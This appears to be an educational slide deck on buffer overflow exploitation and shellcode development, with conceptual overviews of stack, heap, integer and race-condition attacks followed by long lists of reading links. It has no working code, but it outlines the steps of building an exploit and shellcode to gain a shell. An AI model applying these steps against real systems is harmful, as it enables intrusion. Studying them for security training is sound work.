Buffer Overflow Guide 1

Joas Antonio

[Link]
What is Exploit?
• It is a piece of script designed to explore a determined security
breach;
• Exploits consist of shellcodes and a piece of code to insert in a
vulnerable application;
What is Shellcode?
• Shellcode is defined as a set of instructions injected and then executed by
an exploit. Shellcode is used to directly manipulate the logs and functionality
of an exploit, even ensuring a shell on the target machine, being its main
purpose and many harnessing the codename Shell to refer to this, but maybe
it turns out to be just an idea.
• In buffer overflow are codes used in exploration, used in development of
exploits to exploit Buffer Overflow. who ever analyzed buffer overflow
exploits already seen them, shellcodes are built only with the hexadecimal
values ​of the opcodes of the target architecture, or that is, the instructions of
the processor itself, so the understanding of the assembly language, which to
some extent, has a 1 to 1 relationship with the machine language, if
necessary. The shellcode is the code that will be actually executed while
exploiting a buffer overflow. are called 'shellcodes' as your goal is usually to
get a shell.
Exploit Development and Buffer Overflow
Requeriments
• Knowledge in C Language;
• Knowledge in Python Language;
• Knowledge in Assembly x86 and x64;
• Memory and system address management;
• Knowledge in Buffer Overflow;
• Knowledge in Reverse Engineering;
• Knowledge in Registers;
• Concepts of Software Protection Mechanisms (DEP, NX and
ASLR);
• Fuzzing Concepts;
Stack Based Buffer Overflow
• Stack-based buffer overflow exploits are likely the shiniest and
most common form of exploit for remotely taking over the code
execution of a process. These exploits were extremely common 20
years ago, but since then, a huge amount of effort has gone into
mitigating stack-based overflow attacks by operating system
developers, application developers, and hardware manufacturers,
with changes even being made to the standard libraries developers
use. Below, we will explore how stack-based overflows work and
detail the mitigation strategies that are put in place to try to
prevent them.
• [Link]
overflow-attacks-what-you-need-to-know/
Stack Based Buffer Overflow
The first thing that we need to do
is send more data that the buffer
can handle which overwrites the
EIP Address as shown in the
following figure.

[Link]
2018/04/13/buffer-overflow-
exploit-part-3/
HEAP CORRUPTION EXPLOITS
• Heap corruption occurs when
the heap memory area is not has
enough space for the data being
written to it
• Heap memory is used
dynamically by the application in
time of execution

[Link]
-based-buffer-overflow-in-
dlmalloc_fig1_244152148
Integer Overflow Attack
• Integer bugs are exploited by
passing an integer oversized to a
variable integer
• This may cause program control
data to be overwritten valid,
resulting in malicious code
execution
[Link]
c/defeating-integer-overflow-attack/
Race Condition
• Race condition is a software vulnerability that occurs when
multiple accesses to the shared resource are not properly
controlled;
• Types of Race Condition Attacks:
• File race condition: Occurs when the attacker exploits a non atomic
condition in a timed manner by creating, writing, reading and deleting a
file in a temporary directory;
• Signal Race Condition: The treatment race conditions signal can
occur whenever an installed function such as a signal handler is not
reentrant, which means it keeps some internal state or call another
function that does;
[Link]
Socket Binding Exploits
• Client-side socket: Involves writing code to connecting the
application to a remote server;
• Server-side socket: Involves writing code to listen on a port and
process incoming connections;
[Link]
[Link]
[Link]
[Link]
inteledison/
[Link]
Basic step-by-step development an exploit
1. Identify and analyze application bugs;
2. Write code to manipulate and control the target's memory;
3. Redirect the execution flow;
4. Inject the Shellcode;
5. Encrypt your socket communication;
Differences between Exploits on Windows and
Linux
Windows:
• Explores call functions exported by link libraries Dynamic;
• Exploits written for Windows override return addresses in
stack with an address containing “jmp reg” instruction where reg
represents record;
Linux:
• Linux exploits use system calls;
• Exploits replace saved return addresses with a address stack where
a user supplied data can be found;
Types of Shellcode
• Shellcodes are sets of instructions used by exploit programs to perform the desired function;
• They run after a vulnerability is exploited;
• Machine instructions are used to directly process the instruction desired in the memory
location;
• These machine instructions consist of opcodes;
Remote Shellcode:
• Port Binding Shellcode
• Socket Descriptor Reuse Shellcode
Shellcode location:
• execve shellcode
• setuid shellcode
• chroot shellcode
• Windows shellcode
Shellcode Development
• Write code in assembly language or in C language and do
a disassembler;
• Collect the args and syscall id;
• Convert your assembly code into opcodes;
• Eliminate null bytes;
• Start a shell;
• Compile and run;
• Trace the code;
• Inject shellcode at program startup;
[Link] shellcode-e-explorando-uma-dos-
santos/
[Link]
[Link]
Shellcode Development Problems
• Address problem;
• Null Bytes Problem;
• Implementation of System Call;
• [Link]
problem
• [Link]
returnaddress-for-shellcode
• [Link]
removingnull-bytes-0161591/
• [Link]
• [Link]
• [Link]
• [Link]
Assembly Basic
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Arquitetura/dp/8575226673
• [Link]
• [Link]
• [Link]
Reverse Engineering
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
tutorials/tutorial-15-using-the-call-stack/
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Reverse Engineering #2
• [Link]
• [Link]
concepts-f88b233c63b7
• [Link]
intermediate-guide-links-f64c207505ed
• [Link]
• [Link]
• [Link]
programming-concepts-b4e292b2f3e
• [Link]
• [Link]
• [Link]
• [Link]
Reversing__Secrets_of_Reverse_Engineering-Wiley(2005).pdf
Windows Internals
• [Link]
• [Link]
• [Link]
• [Link]
•[Link]
•[Link]
• [Link]
• [Link]
review7001bfdf335e
• [Link]
• [Link]
Buffer Overflow
• [Link]
• [Link]
• [Link]
•[Link]
FaoNhzC9bRw6&ab_channel=Vin%C3%ADciusVieira
•[Link]
o
• [Link]
• [Link]
• [Link]
4dcae8fa2630
• [Link]
Buffer Overflow 2
• [Link]
vulnerability-760f23c21ebb
• [Link]
• [Link]
• [Link]
5f15c0d5b5c1
• [Link]
E143ff3473c
• [Link]
• [Link]
• [Link]
• [Link]
Buffer Overflow 3
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Buffer Overflow 4
• [Link]
• [Link]
overflow-vulnerability/
•[Link]
First,order%20they%20have%20been%20entered
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Buffer Overflow 5
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
•[Link]
0security%20vulnerability.
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Dev Exploit
• [Link]
• [Link]
• [Link]
• [Link]
tutorial-part-3-seh/
• [Link]
• [Link]
• [Link]
overflows
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
Dev Exploit 2
• [Link]
part-8-win32-egg-hunting/
• [Link]
• [Link]
[Link]
• [Link]
exploit-cve-2012-0124/
• [Link]
• [Link]
[Link]
Shellcode Dev
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
system
• [Link]
• [Link]
• [Link]
Shellcode Dev 2
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdf
• [Link]
executing-shellcode-from-portable-executable-resources
• [Link]
• [Link]
detector_fig1_274570378
• [Link]
Shellcode Dev 3
• [Link]
• [Link]
• [Link]
securitytube-linux-assembly-expert-32-bit-exercise-4-568c5a18149a
• [Link]
• [Link]
• [Link]
31816e767611
• [Link]
decoder/
• [Link]
• [Link]
Debuggers
• [Link]
conhe%C3%A7a-o-gef-r331/
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
2/Using%20Immunity%20Debugger%20to%20Write%[Link]
• [Link]
immunity-debugger-3
Extra Resources
• [Link]
• [Link]
development-part1
• [Link]
•[Link]
ng
• [Link]
• [Link]
•[Link]
MYz61RcwSCoVO8 (Assembly)
•[Link]
QxcNVkmJLGQwyKE
Extra Resources 2
• [Link]
xMs&list=PLIfZMtpPYFP6_YOrfX79YX79I5V6mS0ci
• [Link]
• [Link]
everything-you-need-know-0167801/
• [Link]
• [Link]
• [Link]